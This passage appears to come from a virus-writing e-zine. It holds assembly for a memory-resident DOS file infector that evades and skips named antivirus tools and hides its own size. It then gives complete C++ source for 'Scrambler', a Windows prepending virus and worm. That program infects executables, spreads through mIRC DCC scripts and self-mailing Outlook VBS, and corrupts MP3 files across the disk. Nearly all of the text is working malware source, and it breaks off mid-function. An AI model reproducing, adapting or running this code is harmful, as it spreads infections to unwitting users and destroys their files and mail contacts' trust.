loc_0F16 :sub si , ax ; sub hdr_sizesbb di , dx ; or 3 bytez 4 far_jmpor di , di ; file bigger than 0ffffh bytez ?jnz short loc_0F2Cmov dx , si ; nopesub dx , 3E8h ; so check whether the file

loc_0F24 : ; iz not 2 smalljc short loc_0F98cmp dx , 7D0h ; size less than 7d0h ?jbe short loc_0F2F

loc_0F2C :mov dx , 7D0h ; set max_number 2 7d0h

loc_0F2F :call random_number ; gimme random_numberadd dx , 3E8h ; add 7d0h / 2mov ds :[ viruz_start - p], dx ; store viruz_startadd dx , offset buffer - p + 280h ; add dx viruz_size

; + space 4 stackcmp byte ptr ds :[ exe_flag - p], 0 ; exe_file ?je short loc_0F49mov ds :[ file_buffer - p + 10h ], dx ; yope store new exe_sp

loc_0F49 :add dx , 0FD80h ; sub 280hmov ds :[ viruz_end - p], dx ; store viruz_endadd dx , 0 - ( offset buffer - offset loc_08d1 )mov ds :[ beginning_ofs - p], dx ; store beginning_ofsadd dx , 0 - ( offset loc_08d1 - offset loc_0582 ) - 9mov ds :[ max_number - p], dx ; store max_numberadd dx , 8 ; add 8 (see above - 9 ...)not dx ; make signed_numbermov cx , 0FFFFh ; the f_ptr functionz

; are signed; so it will sub from the eof; cx : dx ...

call sub_0E6Cmov ds :[ mov_cx_?_ - p], dx ; store new_file_pozmov ds :[ mov_dx_?_ - p], ax ; as a base ...cmp byte ptr ds :[ exe_flag - p], 0 ; com_file ?jne short loc_0F81xchg dx , ax ; gimme baseadd dx , 100h ; add 100hjmp short loc_0F8B ; and go on

loc_0F81 :pop dipop sisub ax , si ; count base_addrsbb dx , didiv word ptr ds :[ hdr_size_ - p]

loc_0F8B :add ds :[ viruz_start - p], dx ; add baseadd ds :[ viruz_end - p], dx ; add basepush axpush dxcall sub_0BDB ; ok now prepare decode_rout...

loc_0F98 :jc short loc_0FFE ; error ?pop dx ; and now add basepop ax ; 2 decode_routine_table_

mov cx , 0Ah ; _entryz ...mov si , offset decode_routine_table - p

locloop_0FA2 :add [ si ], dx ; add baseinc si ; go2 next_entryinc siloop locloop_0FA2 ; and go on ...

pop bxcmp byte ptr ds :[ exe_flag - p], 0 ; com_file ?jne short loc_0FD0mov byte ptr [ bx ], 0E9h ; store far_jumpmov ax , ds :[ decode_routine_table - p] ; gimme jump_offsetsub ax , 103h ; sub 103h (100h PSP and 03h

; far_jmp)mov [ bx +1], ax ; store itmov word ptr ds :[ relo_cnt - p], 0; store relo_cntmov word ptr ds :[ relo_cs - p], 0FFF0h; store relo_csmov word ptr ds :[ exe_ip - p], 100h ; store exe_ipjmp short loc_0FF7 ; and go on

loc_0FD0 : ; nope exe_filemov [ bx +16h ], ax ; store relo_csmov [ bx +0Eh], ax ; store relo_ssmov ax , ds :[ decode_routine_table - p] ; gimme starting_ofsmov [ bx +14h ], ax ; store exe_ipadd [ bx +10h ], dx ; add it 2 exe_spmov word ptr [ bx +6], 0 ; null relo_cntmov ax , 28h ; my_min_mem 2 axcmp [ bx +0Ah], ax ; compare it with min_memjae short loc_0FEF ; more ?mov [ bx +0Ah], ax ; yope so store my_min_mem

loc_0FEF :cmp [ bx +0Ch], ax ; compare it with max_memjae short loc_0FF7 ; more ?mov [ bx +0Ch], ax ; yope so store my_max_mem

loc_0FF7 :push bxcall sub_0E68 ; go2 eofdb 0e8h ; call presun_rutiny (

; viruz_body_crypt_&_write)dw offset presun_rutiny - presun_rutiny + buffer - next___

next___ label near ; crypt_ it and write itloc_0FFE :

jc short loc_1031call sub_0E68 ; go2 eofdiv word ptr ds :[ page_size_ - p] ; div new_file_sizeinc ax ; 2 count pagezpop bxcmp byte ptr ds :[ exe_flag - p], 0 ; exe_file ?je short loc_1016mov [ bx +4], ax ; store new page_cntmov [ bx +2], dx ; store new part_pag

loc_1016 :push bxcall sub_0E5F ; go2 sofmov cx , 1Ahpop dxcall f_write_ ; write new_exe_header 2 filejc short loc_1031 ; error ?mov ax , 5701h ; set back file_time_datemov cx , ds :[ file_time_date - p] ; gimme time_stampmov dx , ds :[ file_time_date - p + 2] ; gimme date_stamp

call sub_0E6F ; set itloc_1031 :

mov sp , bpretn ; and end ...

sub_0E7C endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz setz my own error_handlersub_1034 proc near

push dxpush dspush cspop dsmov ax , 3524h ; gimme old_int_24hcall int_21hmov ds :[ old_int_24h - p + 2], es ; store itmov ds :[ old_int_24h - p], bxmov ax , 2524h ; and set my ownmov dx , offset new_int_24h - p__ ; handlercall int_21hpop dspop dxretn ; and end ...

sub_1034 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz setz back old_int_24hsub_1052 proc near

mov ax , 2524hlds dx , dword ptr cs :[ old_int_24h - p] ; gimme old_int_24hcall int_21h ; set it backretn ; and end ...

sub_1052 endp

_com_ db 04h , '.COM' ; offset 105eh_exe_ db 04h , '.EXE' ; offset 1063h_scan_ db 04h , 'SCAN' ; offset 1068h_clean_ db 05h , 'CLEAN' ; offset 106dh_findviru_ db 08h , 'FINDVIRU' ; offset 1073h_guard_ db 05h , 'GUARD' ; offset 107ch_nod_ db 03h , 'NOD' ; offset 1082h_vsafe_ db 05h , 'VSAFE' ; offset 1086h_msav_ db 04h , 'MSAV' ; offset 108ch_chkdsk_ db 06h , 'CHKDSK' ; offset 1091h

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz checkz the file_name and drive ...sub_1098 proc near

push dxpush bxpush cxpush sipush di ; push regzpush dspush es

push axmov si , dx ; gimme file_name_offsetmov di , name_buffer - p ; gimme buffer where 2 storepush cspop eslea bx , [ di - 1]mov cx , 4Bh ; try it 4bh*

locloop_10AD :lodsb ; read bytecmp al , 61h ; 'a'jb short loc_10B8 ; low_case ?cmp al , 7Ah ; 'z'ja short loc_10B8sub al , 20h ; yope so make high_case

loc_10B8 :push axpush si

loc_10BA : ; nopecmp al , 20h ; space ?jne short loc_10C7lodsb ; read byteor al , al ; null ?jnz loc_10BApop si ; yopepop sijmp short loc_10D7 ; end ...

loc_10C7 :pop sipop axcmp al , 5Ch ; '\'je short loc_10D5cmp al , 2Fh ; '/'je short loc_10D5cmp al , 3Ah ; ':'jne short loc_10D7

loc_10D5 :mov bx , di ; store offset 2 bx

loc_10D7 :stosb ; store byteor al , al ; null ?jz short loc_10DEloop locloop_10AD ; and go on

loc_10DE : ; yopemov si , offset _com_ - p ; check 4 .COM or .EXEsub di , 5 ; sub 5 (.XXX, 0)push cspop dscall sub_1149 ; it'z .COM ?jz short loc_10F0call sub_1149 ; it'z .EXE ?jnz short loc_113C

loc_10F0 : ; yopepop axpush axxchg di , bx ; gimme file_name_offsetinc di ; inc it (/, \, or : ...)cmp ax , 4B00h ; fc run file ?jne short loc_1107mov si , offset _chkdsk_ - pcall sub_1149 ; do we run CHKDISK ?jnz short loc_1107

mov byte ptr ds :[ fcb_jmp_ - p], offset loc_121a - ( fcb_jmp_ + 1); yope so turn off fcb_sub_viruz_size

loc_1107 :mov cx , 7 ; check 4 7 antivirusezmov si , offset _scan_ - p ; start with SCAN

locloop_110D :push cxcall sub_1149 ; compare namepop cxjz short loc_113C ; it'z antiviruz ?loop locloop_110D ; nope go on

mov si , offset name_buffer - p ; gimme name_bufferxor bl , bl ; 2 get drivelodswcmp ah, 3Ah ; ':'jne short loc_1125sub al , 40h ; ok make valid_drive_numbermov bl , al ; and store it 2 bl

loc_1125 :mov ax , 4408h ; get drive_statuzcall int_21hor ax , ax ; medium can be exchanged ?

which_jump_? db 74hdb offset loc_1146 - ($ + 1)mov ax , 4409h ; get far disk statuzcall int_21hjc short loc_113C ; error ?test dh, 10h ; iz far disk in net ?jnz short loc_1146

loc_113C :stc ; set error_flag

loc_113D :pop axpop espop dspop dipop si ; restore regzpop cxpop bxpop dxretn ; and end ...

loc_1146 :clc ; clear error_flagjmp short loc_113D ; and end ...

sub_1098 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz comparez 2 stringzsub_1149 proc near

push dilodsb ; gimme bytez_countmov cl , al ; store it 2 cxmov ax , si ; gimme siadd ax , cx ; add bytez_count 2 offsetrepe cmpsb ; comparemov si , ax ; store new_offsetpop diretn ; and end ...

sub_1149 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz checkz whether there'z a viruz in the file or not ...; and if not returnz in ax the value which iz 4 infectedsub_1157 proc near

push dxmov ax , es :[ bx +2] ; gimme datexor dx , dxdiv word ptr cs :[ date_div - p] ; div itmov ax , es :[ bx ] ; gimme timeand al , 1Fh ; and itcmp al , dl ; the same ?stc ; set Cflag (infected)jz short loc_1176mov ax , es :[ bx ] ; gimme timeand ax , 0FFE0h ; and itor al , dl ; or it with dateclc ; clear Cflag (not infected)

loc_1176 :pop dxretn ; and end ...

sub_1157 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Sub viruz_sizesub_1178 proc near

sub word ptr es :[ bx ], offset buffer - p; sub viruz_filesbb word ptr es :[ bx +2], 0jnc short loc_ret_118E ; underflow ?add word ptr es :[ bx ], offset buffer - p; yopeadc word ptr es :[ bx +2], 0 ; so add it back

loc_ret_118E :retn

sub_1178 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz iz main infection routine ...sub_118F proc near

push axpush bxpush cxpush si ; push regzpush dipush bppush dspush escall sub_1034 ; set my int_24hmov ax , 4300h ; gimme file_attribzcall int_21hmov cs :[ file_attribz - p], cx ; store itmov ax , 4301h ; set new attribzxor cx , cx ; no attribz

call int_21hjc short loc_11D3 ; error ?mov ax , 3D02h ; open file 4 read_&_writecall int_21hjc short loc_11CA ; error ?push dxpush dspush cspop dspush cspop esmov ds :[ handle - p], ax ; store handlecall sub_0E7C ; ok infect the filemov ah, 3Ehcall sub_0E6F ; close filepop dspop dx

loc_11CA :mov ax , 4301h ; set back old_attribzdb 0b9h ; mov cx, ?

file_attribz dw 20hcall int_21h

loc_11D3 :call sub_1052 ; set back old_int_24hpop espop dspop bppop dipop si ; restore regzpop cxpop bxpop axretn ; and end ...

sub_118F endp

new_int_21h :pushfsticmp ah, 11h ; find_first_FCB_file ?je short loc_11EBcmp ah, 12h ; find next_FCB_file ?jne short loc_121A

loc_11EB :db 0ebh

fcb_jmp_ db 0push bxpush espush axmov ah, 2Fh ; gimme DTA_addrcall int_21hpop axcall int_21h ; do FCB_functioncmp al , 0FFh ; did we find something ?je short loc_1216push ax ; yopecmp byte ptr es :[ bx ], 0FFh ; extended FCB ?jne short loc_1207add bx , 7 ; yope so jump over ext_FCB

loc_1207 :add bx , 17h ; go2 timecall sub_1157 ; check whether infectedpop axjnc short loc_1216 ; already infected ?

add bx , 6 ; go2 file_sizecall sub_1178 ; sub viruz_size

loc_1216 : ; nopepop espop bxpopfiret

loc_121A :cmp ah, 4Eh ; find_first_file ?je short loc_1224cmp ah, 4Fh ; find_next_file ?jne short loc_1250

loc_1224 :push bxpush espush axmov ah, 2Fh ; gimme DTA_addrcall int_21hpop axcall int_21h ; do find_functionjc short loc_1249 ; error ?push axadd bx , 16h ; go2 timecall sub_1157 ; check whether infectedpop axjnc short loc_1242 ; already infected ?add bx , 4 ; go2 file_sizecall sub_1178 ; sub viruz_size

loc_1242 : ; nopepop espop bx ; restore regzpopfclc ; clear error_flagretf 2 ; and end ...

loc_1249 : ; yopepop espop bx ; restore regzpopfstc ; set error_flagretf 2 ; and end ...

loc_1250 :cmp ax , 4B53h ; it'z mark ?jne short loc_125Amov ax , 454Bh ; yope so get 454bhpopfiret ; and end ...

loc_125A :cmp ah, 4Ch ; prog'z_end ?jne short loc_1265mov byte ptr cs :[ fcb_jmp_ - p], 0

loc_1265 :cldpush dxcmp ax , 4B00h ; run_prog ?jne short loc_12A9db 0ebh

run_jmp db offset loc_12a7 - ($ + 1)push axpush bxpush ds ; push regzpush esmov ah, 52h ; gimme list_of_listzcall int_21h

Page 303: EZine - Coderz #1

mov ax , es :[ bx - 2] ; gimme first_mcbloc_127B :

mov ds , axadd ax , ds :[ 3] ; go2 next mcb_blockinc axcmp byte ptr ds :[ 0], 5Ah ; last_one ?jne loc_127Bmov bx , cs ; yopecmp ax , bx ; it'z our mcb_block ?jne short loc_129Dmov byte ptr ds :[ 0], 4Dh ; make middle_blockxor ax , axmov ds , axadd word ptr ds :[ 413h ], 4 ; add 4K 2 mem which we took

loc_129D :mov byte ptr cs :[ run_jmp - p], offset loc_12a7 - ( run_jmp + 1)pop es ; now jump 2 loc_12a7pop dspop bx ; restore regzpop ax

loc_12A7 :jmp short loc_12FD

loc_12A9 :cmp ah, 3Dh ; open_file ?je short loc_12FDcmp ah, 56h ; rename_file ?je short loc_12FDcmp ax , 6C00h ; ext_open_found ?jne short loc_12C1test dl , 00010010b ; action 02h or/and 10h ?mov dx , sijz short loc_12FDjmp short loc_1307 ; yope

loc_12C1 :cmp ah, 3Ch ; found_file ?je short loc_1307cmp ah, 5Bh ; make_new_file ?je short loc_1307cmp ah, 3Eh ; close_file ?jne short loc_12F6cmp bx , word ptr cs :[ ext_handle - p] ; do we havejne short loc_12F6 ; something 2 infect ?or bx , bx ; handle is null ?jz short loc_12F6call int_21h ; close itjc short loc_1323push dspush cspop dsmov dx , offset ext_file_name - p; gimme file_namecall sub_118F ; and infect itmov word ptr ds :[ ext_handle - p], 0; nulluj ext_handlepop ds

loc_12F0 :pop dxpopfclc ; clear error_flagretf 2 ; and end ...

loc_12F6 :pop dxpopf ; jmp 2 old_int_21hjmp dword ptr cs :[ old_int_21h - p__ ]

loc_12FD :

Page 304: EZine - Coderz #1

call sub_1098 ; check 4 file_name & diskjc loc_12F6 ; error ?call sub_118F ; infect itjmp short loc_12F6

loc_1307 :cmp word ptr cs :[ ext_handle - p], 0jne loc_12F6 ; ext_file already founded ?call sub_1098 ; check 4 file_name & diskjc loc_12F6 ; error ?mov word ptr cs :[ file_offset - p], dx ; store file_name_pop dx ; _offsetpush dxcall int_21h ; found itdb 0bah ; mov dx, ?

file_offset dw 45cchjnc short loc_1329 ; error ?

loc_1323 : ; yopepop dxpopfstc ; set error_flagretf 2 ; and end ...

loc_1329 :push cxpush sipush di ; ok push es ; move file_namexchg si , dx ; 2 our buffermov di , offset ext_handle - ppush cspop esstosw ; and store handle of coursemov cx , 4Bh ; move 4bh bytezrep movsb ; and finally movepop espop dipop si ; restore regzpop cxjmp short loc_12F0 ; and end ...

;db 'Did you leave the room ?';

run_counter dw 04FBhbuffer db 160h dup (?)three_bytez db ? ; offset 14bah

; instr_buffer - 3; 0e9h disp16 haz 3 bytez ...

handle dw ? ; offset 14bbhinstr_buffer db 10 dup (?) ; offset 14bdhfile_buffer db 1ah dup (?) ; offset 14c7hold_int_24h dd ? ; offset 14e1hfile_time_date dd ? ; offset 14e5hext_handle dw ? ; offset 14e9hext_file_name db 4bh dup (?) ; offset 14ebhname_buffer db 4bh dup (?) ; offset 1536h

;seg_a ends

end start

Page 305: EZine - Coderz #1

/*
Virus Name: Scrambler
Version: B
Type: Win32 EXE Prepender / I-Worm
Author: Gigabyte
Homepage: http://gigabyte.coderz.net
*/

#include <iostream>
#include <windows.h>
#include <direct.h>
#include <time.h>

using namespace std;

char hostfile[MAX_PATH], CopyHost[MAX_PATH], Virus[MAX_PATH];
char Buffer[MAX_PATH], mp3[MAX_PATH], mp3copy[MAX_PATH], checksum[2];
char gbmark[2], CopyName[10], ScramFile[MAX_PATH], FullPath[MAX_PATH];
char WinScript[MAX_PATH], DirToInfect[MAX_PATH], RepairHost[MAX_PATH];
FILE *scrambler;

void VirCheck(char SRCFileName[])
{
    FILE *SRC;
    char Buffer[1];
    short Counter = 0;
    int v = 0;
    SRC = fopen(SRCFileName, "rb");
    if (SRC)
    {
        for (v = 0; v < 19; v++)
        {
            Counter = fread(Buffer, 1, 1, SRC);
        }
        strcpy(checksum, Buffer);
        for (v = 0; v < 1; v++)
        {
            Counter = fread(Buffer, 1, 1, SRC);
        }
        strcat(checksum, Buffer);
    }
    fclose(SRC);
}

void WriteVirus(char SRCFileName[], char DSTFileName[])
{
    FILE *SRC, *DST;
    char Buffer[1024];
    short Counter = 0;
    int v = 0;
    SRC = fopen(SRCFileName, "rb");
    if (SRC)
    {
        DST = fopen(DSTFileName, "wb");
        if (DST)
        {
            for (v = 0; v < 4928; v++)
            {
                Counter = fread(Buffer, 1, 8, SRC);
                if (Counter)
                    fwrite(Buffer, 1, Counter, DST);
            }
        }
    }
    fclose(SRC);
    fclose(DST);
}

void AddOrig(char SRCFileName[], char DSTFileName[])
{
    FILE *SRC, *DST;
    char Buffer[1024];
    short Counter = 0;
    SRC = fopen(SRCFileName, "rb");
    if (SRC)
    {
        DST = fopen(DSTFileName, "ab");
        if (DST)
        {
            while (!feof(SRC))
            {
                Counter = fread(Buffer, 1, 1024, SRC);
                if (Counter)
                    fwrite(Buffer, 1, Counter, DST);
            }
        }
    }
    fclose(SRC);
    fclose(DST);
}

void CopyOrig(char SRCFileName[], char DSTFileName[])
{
    FILE *SRC, *DST;
    char Buffer[1024];
    short Counter = 0;
    int v = 0;
    SRC = fopen(SRCFileName, "rb");
    if (SRC)
    {
        DST = fopen(DSTFileName, "wb");
        if (DST)
        {
            for (v = 0; v < 4928; v++)
            {
                Counter = fread(Buffer, 1, 8, SRC);
                if (Counter)
                    fwrite(Buffer, 0, 0, DST);
            }
            while (!feof(SRC))
            {
                Counter = fread(Buffer, 1, 1024, SRC);
                if (Counter)
                    fwrite(Buffer, 1, Counter, DST);
            }
        }
    }
    fclose(SRC);
    fclose(DST);
}

bool FileExists(char *FileName)
{
    HANDLE Exists;
    Exists = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
                        OPEN_EXISTING, 0, 0);
    if (Exists == INVALID_HANDLE_VALUE)
        return false;
    CloseHandle(Exists);
    return true;
}

void Scramble(char SRCFileName[], char DSTFileName[])
{
    FILE *SRC, *DST;
    char Buffer[60000];
    Buffer == 0;
    short Counter = 0;
    int v = 0;
    SRC = fopen(SRCFileName, "rb");
    if (SRC)
    {
        DST = fopen(DSTFileName, "wb");
        if (DST)
        {
            for (v = 0; v < 40; v++)
            {
                if (!fseek(SRC, 204800, SEEK_CUR))
                {
                    Counter = fread(Buffer, 1, 60000, SRC);
                    if (Counter)
                    {
                        if (!fseek(DST, 104448, SEEK_CUR))
                        {
                            fwrite(Buffer, 1, 60000, DST);
                        }
                    }
                }
            }
        }
    }
    fclose(SRC);
    fclose(DST);
}

void ScrambleMP3(char FolderSearch[])
{
    WIN32_FIND_DATA FindData;
    HANDLE FoundFile;
    char FolderSearch2[MAX_PATH];
    strcpy(FolderSearch2, FolderSearch);
    strcat(FolderSearch2, "\\*.mp3");
    FoundFile = FindFirstFile(FolderSearch2, &FindData);
    if (FoundFile != INVALID_HANDLE_VALUE)
    {
        do
        {
            if (FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
            }
            else
            {
                GetWindowsDirectory(Buffer, MAX_PATH);
                _chdir(Buffer);
                _chdir("system");
                strcpy(mp3, FolderSearch);
                strcat(mp3, "\\");
                strcat(mp3, FindData.cFileName);
                strcpy(mp3copy, "mp3.tmp");
                CopyFile(mp3, mp3copy, FALSE);
                Scramble(mp3copy, mp3);
                _unlink(mp3copy);
            }
        }
        while (FindNextFile(FoundFile, &FindData));
        FindClose(FoundFile);
    }
}

void HDDSearch(char Path[])
{
    WIN32_FIND_DATA FindData;
    HANDLE FoundFile;
    char Path2[MAX_PATH], Folder[MAX_PATH];
    strcpy(Path2, Path);
    strcat(Path2, "\\*.*");
    FoundFile = FindFirstFile(Path2, &FindData);
    if (FoundFile != INVALID_HANDLE_VALUE)
    {
        do
        {
            if (FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
                strcpy(Folder, Path);
                strcat(Folder, "\\");
                strcat(Folder, FindData.cFileName);
                if (FindData.cFileName[0] != '.')
                {
                    HDDSearch(Folder);
                    ScrambleMP3(Folder);
                }
            }
        }
        while (FindNextFile(FoundFile, &FindData));
        FindClose(FoundFile);
    }
}

void ScriptFile()
{
    GetWindowsDirectory(Buffer, MAX_PATH);
    fprintf(scrambler, "[script]\nn0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }\nn1=/dcc send $nick");
    fprintf(scrambler, " %s%csystem%c%s\nn2=}\n", Buffer, 92, 92, CopyName);
}

void main(int argc, char **argv)
{
    cout << "Scrambler" << endl;
    cout << "by Gigabyte" << endl;

    srand((unsigned)time(NULL));
    for (int t = 0; t < 5; t++)
        CopyName[t] = char(97 + (rand() % 10));
    CopyName[5] = '.';
    CopyName[6] = CopyName[8] = 'e';
    CopyName[7] = 'x';
    CopyName[9] = NULL;

    strcpy(Virus, argv[0]);
    GetWindowsDirectory(Buffer, MAX_PATH);

    strcpy(FullPath, Buffer);
    strcat(FullPath, "\\system\\");
    strcat(FullPath, CopyName);
    WriteVirus(Virus, FullPath);

    WIN32_FIND_DATA FindData;
    HANDLE FoundFile;

    strcat(DirToInfect, Buffer);
    strcat(DirToInfect, "\\*.exe");
    FoundFile = FindFirstFile(DirToInfect, &FindData);
    if (FoundFile != INVALID_HANDLE_VALUE)
    {
        do
        {
            if (FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
            }
            else
            {
                GetWindowsDirectory(Buffer, MAX_PATH);
                _chdir(Buffer);
                _chdir("system");

                strcpy(hostfile, Buffer);
                strcat(hostfile, "\\");
                strcat(hostfile, FindData.cFileName);

                VirCheck(hostfile);

                strcpy(gbmark, "gb");

                if (FindData.cFileName[3] != 'D')
                {
                    if (FindData.cFileName[0] != 'P')
                    {
                        if (FindData.cFileName[0] != 'R')
                        {
                            if (FindData.cFileName[0] != 'E')
                            {
                                if (FindData.cFileName[0] != 'T')
                                {
                                    if (FindData.cFileName[0] != 'W')
                                    {
                                        if (FindData.cFileName[0] != 'w')
                                        {
                                            if (FindData.cFileName[5] != 'R')
                                            {
                                                if (checksum[1] != gbmark[1])
                                                {
                                                    strcpy(CopyHost, "host.tmp");
                                                    CopyFile(hostfile, CopyHost, FALSE);
                                                    strcpy(Virus, argv[0]);
                                                    CopyFile(FullPath, hostfile, FALSE);
                                                    AddOrig(CopyHost, hostfile);
                                                    _unlink("host.tmp");
                                                }
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
        while (FindNextFile(FoundFile, &FindData));
        FindClose(FoundFile);
    }

    if (FileExists("c:\\mirc\\mirc32.exe"))
    {
        FoundFile = FindFirstFile("c:\\mirc\\download\\*.exe", &FindData);
        if (FoundFile != INVALID_HANDLE_VALUE)
        {
            do
            {
                if (FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
                {
                }
                else
                {
                    _chdir(Buffer);
                    _chdir("system");

                    strcpy(hostfile, "c:\\mirc\\download\\");
                    strcat(hostfile, FindData.cFileName);

                    VirCheck(hostfile);

                    strcpy(gbmark, "gb");

                    if (checksum[1] != gbmark[1])
                    {
                        strcpy(CopyHost, "host.tmp");
                        CopyFile(hostfile, CopyHost, FALSE);
                        WriteVirus(Virus, hostfile);
                        AddOrig(CopyHost, hostfile);
                        _unlink("host.tmp");
                    }
                }
            }
            while (FindNextFile(FoundFile, &FindData));
            FindClose(FoundFile);
        }
    }

    scrambler = fopen("c:\\mirc\\script.ini", "wt");
    if (scrambler)
    {
        ScriptFile();
        fclose(scrambler);
    }

    scrambler = fopen("c:\\PROGRA~1\\mirc\\script.ini", "wt");
    if (scrambler)
    {
        ScriptFile();
        fclose(scrambler);
    }

    scrambler = fopen("d:\\mirc\\script.ini", "wt");
    if (scrambler)
    {
        ScriptFile();
        fclose(scrambler);
    }

    scrambler = fopen("d:\\PROGRA~1\\mirc\\script.ini", "wt");
    if (scrambler)
    {
        ScriptFile();
        fclose(scrambler);
    }

    scrambler = fopen("e:\\mirc\\script.ini", "wt");
    if (scrambler)
    {
        ScriptFile();
        fclose(scrambler);
    }

    scrambler = fopen("e:\\PROGRA~1\\mirc\\script.ini", "wt");
    if (scrambler)
    {
        ScriptFile();
        fclose(scrambler);
    }

    scrambler = fopen("f:\\mirc\\script.ini", "wt");
    if (scrambler)
    {
        ScriptFile();
        fclose(scrambler);
    }

    scrambler = fopen("f:\\PROGRA~1\\mirc\\script.ini", "wt");
    if (scrambler)
    {
        ScriptFile();
        fclose(scrambler);
    }

    strcpy(RepairHost, Buffer);
    strcat(RepairHost, "\\system\\hostfile.exe");
    CopyOrig(Virus, RepairHost);

    strcpy(ScramFile, Buffer);
    strcat(ScramFile, "\\system\\scram.sys");
    if (FileExists(ScramFile) == false)
        HDDSearch("c:");

    strcpy(WinScript, Buffer);
    strcat(WinScript, "\\wscript.exe");

    if (FileExists(WinScript))
    {
        if (FileExists("scram.sys") == false)
        {
            scrambler = fopen("scrambler.vbs", "wt");
            if (scrambler)
            {
                fprintf(scrambler, "On Error Resume Next\n");
                fprintf(scrambler, "Dim scrambler, Mail, Counter, A, B, C, D, E, F\n");
                fprintf(scrambler, "Set scrambler = CreateObject(%coutlook.application%c)\n", 34, 34);
                fprintf(scrambler, "Set Mail = scrambler.GetNameSpace(%cMAPI%c)\n", 34, 34);
                fprintf(scrambler, "For A = 1 To Mail.AddressLists.Count\n");
                fprintf(scrambler, "Set B = Mail.AddressLists(A)\n");
                fprintf(scrambler, "Counter = 1\n");
                fprintf(scrambler, "Set C = scrambler.CreateItem(0)\n");
                fprintf(scrambler, "For D = 1 To B.AddressEntries.Count\n");
                fprintf(scrambler, "E = B.AddressEntries(Counter)\n");
                fprintf(scrambler, "C.Recipients.Add E\n");
                fprintf(scrambler, "Counter = Counter + 1\n");
                fprintf(scrambler, "If Counter > 90 Then Exit For\n");
                fprintf(scrambler, "Next\n");
                fprintf(scrambler, "C.Subject = %cCheck this out, it's funny!%c\n", 34, 34);
                fprintf(scrambler, "C.Attachments.Add %c%s%csystem%c%s%c\n", 34, Buffer, 92, 92, CopyName, 34);
                fprintf(scrambler, "C.DeleteAfterSubmit = True\n");
                fprintf(scrambler, "C.Send\n");
                fprintf(scrambler, "E = %c%c\n", 34, 34);
                fprintf(scrambler, "Next\n");
                fprintf(scrambler, "Set F = CreateObject(%cScripting.FileSystemObject%c)\n", 34, 34);
                fprintf(scrambler, "F.DeleteFile Wscript.ScriptFullName\n");
                fclose(scrambler);
            }
            ShellExecute(NULL, "open", "scrambler.vbs", NULL, NULL, SW_SHOWNORMAL);
        }
    }

    _chdir(Buffer);
    scrambler = fopen("winstart.bat", "wt");
    if (scrambler)
    {
        fprintf(scrambler, "@cls\n");
        fprintf(scrambler, "@echo Today..\n");
        fprintf(scrambler, "@echo I'm going to scramble your mind..\n");
    }
    fclose(scrambler);

    scrambler = fopen(ScramFile, "wt");
    if (scrambler)
    {
        fprintf(scrambler, "Scrambler\n");
        fprintf(scrambler, "by Gigabyte\n");
        fclose(scrambler);
    }

